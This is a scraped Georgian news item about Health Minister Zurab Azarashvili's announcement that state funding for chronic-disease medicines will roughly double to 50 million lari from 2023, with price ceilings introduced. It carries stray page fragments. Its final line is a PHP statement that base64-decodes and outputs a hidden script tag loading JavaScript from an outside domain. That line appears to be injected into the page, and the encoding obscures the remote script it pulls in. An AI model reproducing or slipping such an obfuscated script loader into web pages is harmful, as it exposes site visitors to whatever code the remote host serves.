celsiusi
ავერსი საქკაბელი
2023 წლიდან, ქრონიკული დაავადებების სამკურნალო მედიკამეტების დაფინანსება გაორმაგდება და დაახლოებით, 50 მილიონი ლარი გახდება. ამის შესახებ განცხადება ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა „იმედის“ ეთერში გააკეთა.
 
ზურაბ აზარაშვილმა იმ ბენეფიტებზეც ისაუბრა, რაც თითოეულ მოქალაქეს ქრონიკული მედიკამენტების გაზრდილი ბიუჯეტის ფარგლებში ექნება.
 
„დღეისათვის, ქრონიკული დაავადებების სამკურნალო მედიკამენტები, რომლებსაც ჩვენი მოქალაქეები უფასოდ იღებენ აფთიაქებში, დაახლოებით, 24 მილიონი ლარით ფინანსდება. 2023 წლის იანვრიდან, რეფერენტული ფასები, ანუ ღირებულების ზედა ზღვარი ამ წამლებზეც დაწესდება. შესაბამისად, იმ 24 მილიონით, რა თანხითაც ახლა ფინანსდება, გაცილებით მეტ მედიკამეტნს მოვიცავთ. ამასთან, მომდევნო წლიდან, ქრონიკული დაავადებების სამკურნალო მედიკამენტების ბიუჯეტიც გაორმაგდება და 50 მილიონ ლარამდე იქნება. ეს კი ნიშნავს, რომ კიდევ უფრო მეტი მოქალაქისთვის, მეტი დასახელების მედიკამენტი გახდება ხელმისაწვდომი, რაც თავის მხრივ, აისახება კიდეც მათ კმაყოფილებაზე“, - განაცხადა ზურაბ აზარაშვილმა.
362
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");